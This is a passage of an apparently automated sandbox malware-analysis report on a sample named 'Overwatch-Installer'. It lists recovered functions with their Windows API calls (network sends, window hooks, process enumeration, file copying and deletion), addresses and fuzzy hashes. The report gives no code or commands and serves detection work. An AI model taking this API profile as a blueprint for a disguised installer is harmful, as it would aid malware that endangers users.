Instruction Fuzzy Hash: A31190B55093849FDB11CF25DC85B62BFE8EF06220F0884EEED85CB252D275E949CB61

Function 05BF3B2E Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF3B8A

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 467f7dbe1124aaa9a913f67fbf7f341bc5bf19da3f306250b5206701e3ba94bd
Instruction ID: f221b2f7433f9bdbbbb785db4758090eaddcabeeca37a693ca4f84b5e3abbf63
Opcode Fuzzy Hash: 467f7dbe1124aaa9a913f67fbf7f341bc5bf19da3f306250b5206701e3ba94bd
Instruction Fuzzy Hash: 9E11E371504244AFEB21CF50DD44FBAFBE8EF44724F0888AAEE458B641D374A40C8BB5

Function 05BF5523 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 05BF5588

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 4ad36f11785f4e427db32e372716467f10ce38c1eb5283bbcbc9bcc52a47755f
Instruction ID: d4bd5988c8cdd1ac7f964acf366dc9d2b9cd1bc550299523f7329b9af681aff0
Opcode Fuzzy Hash: 4ad36f11785f4e427db32e372716467f10ce38c1eb5283bbcbc9bcc52a47755f
Instruction Fuzzy Hash: 79119371409780AFDB228F15DC44B62FFB4EF46320F0884DEED858B662D365A818DB72

Function 05BF571D Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 05BF5788

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: ce31b8b0fa4196f7f227b9526b2857133ff7ebc1e646c189b2f3f8ece4af2738
Instruction ID: 2628cfc305c549cae3f31bde92f76d23e4136fe2dc772910c9b9e95c8c517014
Opcode Fuzzy Hash: ce31b8b0fa4196f7f227b9526b2857133ff7ebc1e646c189b2f3f8ece4af2738
Instruction Fuzzy Hash: 3F114F754093C0AFD7128B15DC84A61BFB4EF47624F0984DADD858F263D2656948CB72

Function 05BF1156 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF11AF

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: a8fef1543002861c1035d3c5815abe7a7c39c60f95b608c4ac7e2fc0c92860bb
Instruction ID: 3341078221b050351b60b8893ee1f67fe4b4711598c5c70986765a793f2bb1a8
Opcode Fuzzy Hash: a8fef1543002861c1035d3c5815abe7a7c39c60f95b608c4ac7e2fc0c92860bb
Instruction Fuzzy Hash: BD11C171504244AFE721CF55CC84BAAFBA8EF04324F1488AAEA458B641C374A54CCBB5

Function 05BF0DA2 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF0DF8

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: e0ac565b457694bd280e8d66af1bef739be8d373050da631bc64b86fa66a8775
Instruction ID: 77bda4e57be99c3c39455d99b0a4dcf3b3755977fa4dc46803cf9617550e825f
Opcode Fuzzy Hash: e0ac565b457694bd280e8d66af1bef739be8d373050da631bc64b86fa66a8775
Instruction Fuzzy Hash: FA110271504248AFEB10DF50CC85BBAFBA8EF04324F0484AAEE458B652D374A44C8BB5

Function 052FBAA0 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052FBACC

Memory Dump Source

Source File: 00000000.00000002.4505713322.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: debcd8b8832dacdd673f10d42e8c86ef2896cb7a4352bf0247204b5e41994bbe
Instruction ID: f85415ad47cdc99918f92f7976746fcd438fba89efb4286536c1fb80a091ee86
Opcode Fuzzy Hash: debcd8b8832dacdd673f10d42e8c86ef2896cb7a4352bf0247204b5e41994bbe
Instruction Fuzzy Hash: ED21187091162ACFDB25CF10D988BAAFBB2BF48305F1484E5D609AB210C779AEC5CF40

Function 0112A8BC Relevance: 1.6, APIs: 1, Instructions: 56comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0112A918

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 128b968db49693bf04ee04be0706250ad730883c38ffd45147a616fb5937c2f1
Instruction ID: 12cf232ce2e84450d1da97481ad950408012e85a4cded41725473a9259c6cc2e
Opcode Fuzzy Hash: 128b968db49693bf04ee04be0706250ad730883c38ffd45147a616fb5937c2f1
Instruction Fuzzy Hash: 27116D715093C0AFDB128F25DC54B92BFB4EF06220F0884DADDC58F253D275A548CB62

Function 0112B452 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 0112B4BB

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 737ed0ff79441261a2874ae1bd735b2fc60bec854f4373d61997e1f2b621fb4b
Instruction ID: 5505a26fb923074a813f5828268272e05ab191cb81ab8b20fed9c7f2ee08bcbc
Opcode Fuzzy Hash: 737ed0ff79441261a2874ae1bd735b2fc60bec854f4373d61997e1f2b621fb4b
Instruction Fuzzy Hash: 6B11E571508244AFE721CF15DD81BBAFBA8DF04724F04809AEE455B681D3B4A94DCBBA

Function 05BF2132 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF2191

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: ad233f741feffad362dfc70f1d642a21e8a784c07534da2d69989d1c202dca63
Instruction ID: f00885cfd181c7ff10dd60915f85525183c42007effb146c900faa0d2f51f8d1
Opcode Fuzzy Hash: ad233f741feffad362dfc70f1d642a21e8a784c07534da2d69989d1c202dca63
Instruction Fuzzy Hash: A511E375000204AFE7218F41CC40FBAFBA8EF04714F14849AEE454B651C370A54D8BB5

Function 05BF5AB8 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 05BF5B25

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1adbf9d17f0c3e44aaba53f43f47a347ca6ca79239ae4f555bd2623e0840cf25
Instruction ID: 31dc56604a0ba0133146c950b7fa73c3ce3bb4257a5c4bd9b2bd002d9cca4d51
Opcode Fuzzy Hash: 1adbf9d17f0c3e44aaba53f43f47a347ca6ca79239ae4f555bd2623e0840cf25
Instruction Fuzzy Hash: 74117C714093C09FDB228F25DC54A62FFF4EF07210F0C84DAEAC44B663D265A858DB62

Function 05BF43F8 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05BF4461

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d86c5773302a99a595641883a91e2604ecdb0a5e9d33fb9552d2b90c01bfbe49
Instruction ID: 4c887c65cb9affb5f3160a5cd47bf65507eb2d0d8537e1fd2243076f3ef0fda5
Opcode Fuzzy Hash: d86c5773302a99a595641883a91e2604ecdb0a5e9d33fb9552d2b90c01bfbe49
Instruction Fuzzy Hash: 39118271409380AFDB228F15DC44E62FFB4EF06320F0984DEEA844B663D275A958CB62

Function 05BF3CCA Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 05BF3D20

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 1503ba570b2e88638b92ae8be8f34c3631e48094492722b0e81d5c17ac30f20a
Instruction ID: 5f6184f4dcc0c86d1b12d1a9e1b513ce9d4f3cf5b39537cdd615aa2354f35d33
Opcode Fuzzy Hash: 1503ba570b2e88638b92ae8be8f34c3631e48094492722b0e81d5c17ac30f20a
Instruction Fuzzy Hash: 3A113D796042449FDB20CF59D985BA2FBE8EF04610F0888AADE49CB651D775F448CB61

Function 0112A078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0112A0D5

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 1ba957ea1813efa8f0feb20fb12dd070187f6c375d6aa68e24f7e38384d747b3
Instruction ID: f96b619fab8a3c1234f80a3de7e57ab881fce94fb4d3be554be9b00c78db6809
Opcode Fuzzy Hash: 1ba957ea1813efa8f0feb20fb12dd070187f6c375d6aa68e24f7e38384d747b3
Instruction Fuzzy Hash: E1118F71549380AFDB22CF55DC44B52FFB4EF46224F08849EED858B552C275A418CB62

Function 05BF14F6 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF154F

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 7325b1d7897778c17da8a9cedd66a407bb11d442ad69d3fdc3702386405d1fe5
Instruction ID: c65f4d85ff9cc12cbd9b7c4cbf477557719b636d6dcda504611023fa3fb5ba98
Opcode Fuzzy Hash: 7325b1d7897778c17da8a9cedd66a407bb11d442ad69d3fdc3702386405d1fe5
Instruction Fuzzy Hash: C511CE71500244EFE7218F45CC85FBAFBA8EF44724F0884AAEE458B651D374A94CCBB5

Function 05BF3FFE Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF4046

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 6db359ed81bb4f4004481d9ec38564555ebe9b563bef41260b3f1d0ea270d127
Instruction ID: 9073e8454269f62189bb78d904769dbb60c4617971e42a05d94189e4e6b518a1
Opcode Fuzzy Hash: 6db359ed81bb4f4004481d9ec38564555ebe9b563bef41260b3f1d0ea270d127
Instruction Fuzzy Hash: 4A1161B26042449FDB10CF69D985B67FBE8EF04720F0884AADE49CB752D775E448CB61

Function 05BF1CBA Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF1D10

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 35fe90e0c3de94bcd1f26cc8d830e4e8f8a52fd77bb22fcadd6950151e10fd00
Instruction ID: 1e0453480df81663384cfa6bcf7c73798e336909b903c7f9db3245e43d4be3b5
Opcode Fuzzy Hash: 35fe90e0c3de94bcd1f26cc8d830e4e8f8a52fd77bb22fcadd6950151e10fd00
Instruction Fuzzy Hash: F101ED75400644EEEB21CF09CC85BBAFBA8EF44624F0484AAEA049B641D374A84DCBB5

Function 0112BEBA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 0112BF0D

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 260691cc010c69019919045202f8cea914697520b5c29b6e940f61a1a826bfab
Instruction ID: e1ef03c58ccad7dc0ed95a3bf660d994071b2f422ea00ea0c53b0b5111958510
Opcode Fuzzy Hash: 260691cc010c69019919045202f8cea914697520b5c29b6e940f61a1a826bfab
Instruction Fuzzy Hash: F601D271508244AEE721CF05DC85FBAFBE8DF44724F04C0A6EE058B741D375A94D8ABA

Function 05BF3F3E Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF3F83

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 9d26a7624474991ab7867e3b82db4f451a539ef4e328259a1e49094c4c13941f
Instruction ID: 781f5c11a13e7119fad0fcf2e7190baf9cff35ab8dbeb64a886d3dda1ff1e660
Opcode Fuzzy Hash: 9d26a7624474991ab7867e3b82db4f451a539ef4e328259a1e49094c4c13941f
Instruction Fuzzy Hash: 4A116171604645AFDB10CF69D984B66FBE8EF04620F08C8AAEE49CB641D774E44CCB61

Function 05BF4362 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(?,?,?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF43AD

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 8c77295a10dc558c74997067daffc071655f789dfb2022001c5a72807825a5f4
Instruction ID: 1f5975866be13c0c55f6293cf95b2edff839e50e8a10e3136d8a92478984dff3
Opcode Fuzzy Hash: 8c77295a10dc558c74997067daffc071655f789dfb2022001c5a72807825a5f4
Instruction Fuzzy Hash: 701139715042449FDB20DF59D985B67FBE9EF04620F0884AADE49CB642E375F408CB62

Function 05BF5DB6 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF5DF6

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: f0cf669afe45744c03a57623502d116e336e8132e689d79de561572ec43bc094
Instruction ID: ab8433985c55a66b7aa8002617e99167fb120e911edca20c4058ad0d3ba74632
Opcode Fuzzy Hash: f0cf669afe45744c03a57623502d116e336e8132e689d79de561572ec43bc094
Instruction Fuzzy Hash: FE1180756042449FDB20CF65D985BA6FBE8EF04320F08C4AADE49CB691D375E458CB61

Function 05BF2206 Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05BF2252

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 9cd28719f50ea8b5cab9fb84d7911f39335ca6074749cd78a2cf91a05813ba9e
Instruction ID: 60c4ae5c09dfbd44f79c2c9aefbd280e1d3088ab8bd0a1d24aef8e5266b1f5d9
Opcode Fuzzy Hash: 9cd28719f50ea8b5cab9fb84d7911f39335ca6074749cd78a2cf91a05813ba9e
Instruction Fuzzy Hash: E1117C755042449FDB20CF55DD44BA6FBE4FF08310F0884AADE858B662D331E458DB61

Function 05BF40C6 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF4103

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 85a24a141c478031bed8ac16543e93b550ddcf38649645af2430171765e5f63b
Instruction ID: 6aac0a9064412537a0e8bac46807d6906dd385041afcbc5dc84a4064e3998d9b
Opcode Fuzzy Hash: 85a24a141c478031bed8ac16543e93b550ddcf38649645af2430171765e5f63b
Instruction Fuzzy Hash: 2901DE716002049FEB10CF29D985B66FFE8EF05220F0884AADE49CB342E335E448CBA1

Function 05BF27D2 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 05BF2822

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 97fe43406ed04da4623d514a5c6902b528a853edeca057f5375e3bead7c8c038
Instruction ID: 11b15288bb3f8bdd71f76379cd057bc76d18581454f2508b094f6a2b7cdb258d
Opcode Fuzzy Hash: 97fe43406ed04da4623d514a5c6902b528a853edeca057f5375e3bead7c8c038
Instruction Fuzzy Hash: 1F017171600200AFD310DF16DD45B66FBE8EB89B20F14856AED489BB41D731F915CBE5

Function 05BF136A Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E24,?,?), ref: 05BF13BA

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 67ba321e59e85b6d5709ba86644e1def164ca580b5e8a5aed234733ced79addd
Instruction ID: bffc79f734066c01dcf6f552f10f5c85ca63de2ef3da1831669c5ff537f3beee
Opcode Fuzzy Hash: 67ba321e59e85b6d5709ba86644e1def164ca580b5e8a5aed234733ced79addd
Instruction Fuzzy Hash: C101B171600200AFD310DF16CC45B66FBE8EB88B20F14812AEC089BB41D731F915CBE5

Function 05BF3E96 Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E24,?,?), ref: 05BF3EE6

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: fe99c3033762822ba1e4ca25d051d3a121ab76485fa5b4eb60b3536c766c0918
Instruction ID: 6f6fc883f686aea81725e4785d8ad92eb9e284af5e3319cb9d390549e829b448
Opcode Fuzzy Hash: fe99c3033762822ba1e4ca25d051d3a121ab76485fa5b4eb60b3536c766c0918
Instruction Fuzzy Hash: D201B171600200AFD310DF16CC45B66FBE8EB88B20F14812AED089BB41D731F915CBE5

Function 05BF4266 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF42A0

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 63878b478827429b0b441697d55997cfaf4ae0e8525686abc847b5beef5e2565
Instruction ID: 3a92e0af7232d1c08bc818f0ab22cd9610542c9d938d282c5b8a785ba415e86f
Opcode Fuzzy Hash: 63878b478827429b0b441697d55997cfaf4ae0e8525686abc847b5beef5e2565
Instruction Fuzzy Hash: 9C019E716042449FDB10CF6AD985BAABBE8EF04324F0884BADE09CB642D274E448CB61

Function 05BF63FE Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05BF6449

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: f55d53fc477edc49e6e7e314c218268caee077a8a3e31aafc50b38664bf8a011
Instruction ID: 730fd44d075f942a5329b3a81009991230ff4b2dc57dfe97ba3d5afb197812c8
Opcode Fuzzy Hash: f55d53fc477edc49e6e7e314c218268caee077a8a3e31aafc50b38664bf8a011
Instruction Fuzzy Hash: 2D014CB15042449FEB20DF19D985B62FBE8FF14620F088099DE4A8B752D775E45CCB72

Function 05BF2BFA Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05BF2C3E

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d49d1cb44004436bee49d8236e97353719472c4efafb8db6f71ead81bb7450fd
Instruction ID: 05cb31e1bcc7034c99e0b1d1e6a9baf2358704a2ce369708625dc8387324c965
Opcode Fuzzy Hash: d49d1cb44004436bee49d8236e97353719472c4efafb8db6f71ead81bb7450fd
Instruction Fuzzy Hash: 87018B368002049FDB21CF95D944B62FBE1EF08324F0888AADE898B611C332E418DB62

Function 05BF589A Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 05BF58D7

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: b22786323f3a883b57f8d5006cb307375491caa42297bd34139c97018fdc4288
Instruction ID: 0b11726f33cfbb96870b34a159e63e2e08b0af93240f51a78b6eebf30359d30a
Opcode Fuzzy Hash: b22786323f3a883b57f8d5006cb307375491caa42297bd34139c97018fdc4288
Instruction Fuzzy Hash: 1701B1716002448FD720CF5AE985B72FBE4EF00620F08C0AADE458B792D674E44CCB72

Function 0112A772 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000E24,?,?), ref: 0112A7BD

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 6b6806698484c47e62fb03d82dd640398f0d4c3e32feeca7a18d50aab6fb29e4
Instruction ID: 98610ebb16a8030f283e038ac2935986c5bf2270ae81a06ca22bccb3a3339d03
Opcode Fuzzy Hash: 6b6806698484c47e62fb03d82dd640398f0d4c3e32feeca7a18d50aab6fb29e4
Instruction Fuzzy Hash: 9101A271500200ABD250DF1ACC46B66FBE8FB88B20F14811AEC489BB41D731F915CBE5

Function 05BF4F22 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E24,?,?), ref: 05BF4F72

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 047565ae6df989e6c1c9a5e4de344f7055ebee7dc1880398b8274c6054ea02ec
Instruction ID: 72c3d5cbf312236f8a06183375deac036bbdb2bed2d67140ada7d07432ea5a67
Opcode Fuzzy Hash: 047565ae6df989e6c1c9a5e4de344f7055ebee7dc1880398b8274c6054ea02ec
Instruction Fuzzy Hash: E901A271500200ABD250DF1ACC46B66FBE8FB88B20F14811AEC089BB41D731F915CBE5

Function 05BF037E Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 05BF03CE

Memory Dump Source

